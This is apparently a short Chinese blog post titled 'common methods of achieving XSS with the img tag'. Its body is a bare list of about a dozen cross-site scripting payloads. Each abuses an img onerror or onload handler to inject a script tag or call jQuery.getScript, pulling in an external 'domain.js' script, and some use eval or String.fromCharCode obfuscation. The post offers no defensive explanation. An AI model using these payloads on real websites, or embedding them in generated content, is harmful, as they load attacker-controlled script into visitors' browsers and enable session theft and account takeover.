#
HTML
2017-01-16
使用img标签实现xss的常见方法
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="domain.js"></img><img src=x onerror="with(document)body.appendChild(createElement('script')).src='domain.js'"></img><img src=1 onerror=jQuery.getScript("domain.js")> <img src="#" onerror="$.getScript('domain.js')"><img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+'domain.sj'+a+'4091')"><img src='0' onerror=with(document)body.appendChild(createElement('script')).src='domain.js'><img src="#" onload="s=document.createElement('script');s.src='domain.js'+Math.random();document.body.appendChild(s)" border="0"><img src=i onerror=eval(jQuery.getScript('domain.js'))><img src=N onerror=eval(javascript:document.write(unescape(' <script src="domain.js"></script>'));)><img src=x onerror=document.body.appendChild(document.createElement('script')).src='domain.js'><img src=x onerror="with(document)body.appendChild(createElement('script')).src='domain.js'" width="0" height="0"></img>
TAGS:
无标签
相关推荐
- 暂无相关推荐,看看别的吧。
0 评论